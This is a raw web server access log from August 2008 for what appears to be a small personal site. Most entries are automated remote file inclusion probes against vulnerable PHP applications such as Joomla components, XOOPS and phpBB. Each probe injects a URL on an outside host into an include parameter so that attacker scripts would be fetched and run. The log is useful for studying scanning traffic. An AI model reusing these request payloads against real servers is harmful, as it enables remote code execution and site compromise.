58.102.118.201 - - [07/Aug/2008:09:21:18 -0500] "GET ///vwar/backup/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
58.102.118.201 - - [07/Aug/2008:09:21:18 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
58.102.118.201 - - [07/Aug/2008:09:21:18 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
58.102.118.201 - - [07/Aug/2008:09:21:18 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
80.67.24.222 - - [07/Aug/2008:09:24:46 -0500] "GET /logs/access_log.1212883200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:09:24:46 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:09:24:46 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
87.253.134.145 - - [07/Aug/2008:09:25:32 -0500] "GET /logs/access_log.1213315200//becommunity/community/index.php?pageurl=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
194.79.75.195 - - [07/Aug/2008:09:26:22 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:26:30 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
59.125.211.84 - - [07/Aug/2008:09:27:15 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
59.125.211.84 - - [07/Aug/2008:09:27:18 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
80.67.24.222 - - [07/Aug/2008:09:27:32 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:09:27:33 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.808"
74.50.7.240 - - [07/Aug/2008:09:28:11 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
74.50.7.240 - - [07/Aug/2008:09:28:11 -0500] "GET /lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.50.7.240 - - [07/Aug/2008:09:28:17 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
74.50.7.240 - - [07/Aug/2008:09:28:17 -0500] "GET /lostpasswd.php?env[include_prefix]=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:28:35 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 358 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:28:35 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 353 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:28:41 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 358 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:28:41 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 353 "-""libwww-perl/5.810"
89.171.112.121 - - [07/Aug/2008:09:29:05 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
80.67.24.222 - - [07/Aug/2008:09:29:10 -0500] "GET /logs/access_log.1213142400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:09:29:45 -0500] "GET /logs/access_log.1213315200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
220.110.178.66 - - [07/Aug/2008:09:33:34 -0500] "GET /logs/index.php?sourcedir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.800"
220.110.178.66 - - [07/Aug/2008:09:33:34 -0500] "GET /index.php?sourcedir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.800"
212.115.37.130 - - [07/Aug/2008:09:34:06 -0500] "GET /logs//inc/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
212.115.37.130 - - [07/Aug/2008:09:34:06 -0500] "GET /logs//inc/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
212.115.37.130 - - [07/Aug/2008:09:34:06 -0500] "GET //inc/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
212.115.37.130 - - [07/Aug/2008:09:34:06 -0500] "GET //inc/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
193.253.223.90 - - [07/Aug/2008:09:35:06 -0500] "GET //include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:35:07 -0500] "GET //include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
216.206.238.35 - - [07/Aug/2008:09:35:30 -0500] "GET /logs/access_log.1214438400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
216.206.238.35 - - [07/Aug/2008:09:35:30 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
216.206.238.35 - - [07/Aug/2008:09:35:30 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
80.67.24.222 - - [07/Aug/2008:09:35:44 -0500] "GET /logs/access_log.1208044800//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 368 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:09:35:44 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:09:35:44 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.808"
193.253.223.90 - - [07/Aug/2008:09:36:08 -0500] "GET /logs//include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:36:08 -0500] "GET //include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:36:12 -0500] "GET /logs//include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:36:12 -0500] "GET //include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:36:13 -0500] "GET /logs//include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:36:13 -0500] "GET //include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:36:13 -0500] "GET /logs//include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:36:14 -0500] "GET //include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
80.67.24.222 - - [07/Aug/2008:09:36:52 -0500] "GET /logs/admin/admin_users.php?phpbb_root_path=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:09:36:52 -0500] "GET /admin/admin_users.php?phpbb_root_path=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.808"
216.206.238.35 - - [07/Aug/2008:09:37:22 -0500] "GET /logs/access_log.1212883200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
78.110.50.111 - - [07/Aug/2008:09:38:11 -0500] "GET /logs/access_log.1212883200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
78.110.50.111 - - [07/Aug/2008:09:38:12 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
78.110.50.111 - - [07/Aug/2008:09:38:12 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
74.6.18.241 - - [07/Aug/2008:09:38:49 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.166 - - [07/Aug/2008:09:38:50 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.206.238.35 - - [07/Aug/2008:09:38:53 -0500] "GET /logs/access_log.1213315200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
77.90.20.2 - - [07/Aug/2008:09:38:55 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:09:39:01 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
216.206.238.35 - - [07/Aug/2008:09:39:02 -0500] "GET /logs/access_log.1213142400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
219.117.239.114 - - [07/Aug/2008:09:44:15 -0500] "GET /logs/access_log.1212883200////?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
219.117.239.114 - - [07/Aug/2008:09:44:15 -0500] "GET ////?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 1245 "-""libwww-perl/5.65"
219.117.239.114 - - [07/Aug/2008:09:44:17 -0500] "GET /logs////?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 94318 "-""libwww-perl/5.65"
78.110.50.111 - - [07/Aug/2008:09:44:30 -0500] "GET /logs/access_log.1213142400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
82.192.81.212 - - [07/Aug/2008:09:45:01 -0500] "GET /logs/access_log.1212883200//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.benjaminclayton.co.uk//help01.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
82.192.81.212 - - [07/Aug/2008:09:45:01 -0500] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.benjaminclayton.co.uk//help01.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
82.192.81.212 - - [07/Aug/2008:09:45:02 -0500] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.benjaminclayton.co.uk//help01.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
78.110.50.111 - - [07/Aug/2008:09:45:32 -0500] "GET /logs/access_log.1213315200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
194.79.75.195 - - [07/Aug/2008:09:45:40 -0500] "GET /logs/access_log.1212883200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:45:40 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:45:40 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
194.79.75.195 - - [07/Aug/2008:09:45:57 -0500] "GET /logs/access_log.1214438400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://electrometro.com.ve/wall/xpl/tst?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
82.192.81.212 - - [07/Aug/2008:09:46:12 -0500] "GET /logs/access_log.1214438400//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.benjaminclayton.co.uk//help01.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
193.253.223.90 - - [07/Aug/2008:09:47:55 -0500] "GET /logs/access_log.1208044800//include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:47:55 -0500] "GET //include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:47:55 -0500] "GET /logs//include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:48:07 -0500] "GET /logs/access_log.1208044800//include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:48:07 -0500] "GET //include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:09:48:08 -0500] "GET /logs//include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
212.115.37.130 - - [07/Aug/2008:09:48:14 -0500] "GET /logs/access_log.1208044800//inc/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
212.115.37.130 - - [07/Aug/2008:09:48:14 -0500] "GET //inc/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
212.115.37.130 - - [07/Aug/2008:09:48:15 -0500] "GET /logs//inc/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
212.115.37.130 - - [07/Aug/2008:09:48:20 -0500] "GET /logs/access_log.1208044800//inc/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
212.115.37.130 - - [07/Aug/2008:09:48:20 -0500] "GET //inc/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
212.115.37.130 - - [07/Aug/2008:09:48:21 -0500] "GET /logs//inc/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
80.67.24.222 - - [07/Aug/2008:09:50:32 -0500] "GET /logs/access_log.1208649600//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 366 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:09:50:32 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:09:50:33 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.808"
74.53.39.34 - - [07/Aug/2008:09:50:45 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
74.53.39.34 - - [07/Aug/2008:09:50:45 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
59.106.19.213 - - [07/Aug/2008:09:51:45 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
59.106.19.213 - - [07/Aug/2008:09:51:45 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.67.24.222 - - [07/Aug/2008:09:52:28 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:09:52:28 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:09:52:34 -0500] "GET /logs/access_log.1205366400//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 366 "-""libwww-perl/5.808"
80.67.24.222 - - [07/Aug/2008:09:53:45 -0500] "GET /logs/access_log.1208044800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 366 "-""libwww-perl/5.808"
219.117.239.114 - - [07/Aug/2008:09:54:37 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
219.117.239.114 - - [07/Aug/2008:09:54:37 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
89.238.65.54 - - [07/Aug/2008:09:54:49 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 299 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:09:54:49 -0500] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 299 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:09:54:50 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 294 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
89.238.65.54 - - [07/Aug/2008:09:54:50 -0500] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 294 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
220.110.178.66 - - [07/Aug/2008:09:55:02 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.800"
220.110.178.66 - - [07/Aug/2008:09:55:02 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
59.106.19.213 - - [07/Aug/2008:09:55:12 -0500] "GET /logs/access_log.1206230400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.115.37.130 - - [07/Aug/2008:09:59:25 -0500] "GET /logs/access_log.1205366400//inc/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
212.115.37.130 - - [07/Aug/2008:09:59:33 -0500] "GET /logs/access_log.1205366400//inc/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
67.18.151.242 - - [07/Aug/2008:10:00:34 -0500] "GET /logs/access_log.1212883200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:10:00:34 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:10:00:34 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:10:01:37 -0500] "GET /logs/access_log.1214438400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
193.253.223.90 - - [07/Aug/2008:10:03:10 -0500] "GET /logs/access_log.1205366400//include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
193.253.223.90 - - [07/Aug/2008:10:03:11 -0500] "GET /logs/access_log.1205366400//include/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
24.127.69.194 - - [07/Aug/2008:10:04:28 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
24.127.69.194 - - [07/Aug/2008:10:04:28 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
24.127.69.194 - - [07/Aug/2008:10:04:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
208.113.240.100 - - [07/Aug/2008:10:04:56 -0500] "GET /logs///vwar/backup/errors.php?error=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
208.113.240.100 - - [07/Aug/2008:10:04:56 -0500] "GET ///vwar/backup/errors.php?error=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
208.113.240.100 - - [07/Aug/2008:10:04:56 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
208.113.240.100 - - [07/Aug/2008:10:05:12 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
74.6.18.231 - - [07/Aug/2008:10:08:43 -0500] "GET /logs/access_log.1164412800 HTTP/1.0" 200 230504 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
24.127.69.194 - - [07/Aug/2008:10:09:41 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
24.127.69.194 - - [07/Aug/2008:10:09:42 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
24.127.69.194 - - [07/Aug/2008:10:09:42 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
24.127.69.194 - - [07/Aug/2008:10:09:42 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/